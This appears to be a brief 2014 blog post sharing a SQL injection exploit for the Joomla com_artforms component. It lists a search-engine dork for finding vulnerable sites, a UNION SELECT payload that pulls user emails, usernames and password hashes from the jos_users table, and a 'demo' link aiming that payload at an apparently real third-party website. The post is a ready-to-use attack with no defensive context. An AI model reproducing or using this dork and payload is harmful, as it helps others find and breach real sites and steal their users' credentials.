Wednesday, October 15, 2014

[Share] : Joomla com_artforms SQLi Exploit

Dork:
inurl:"option com_artforms"

Exploit:
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

Demo:
http://www.expeeronline.eu/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

No comments:

Post a Comment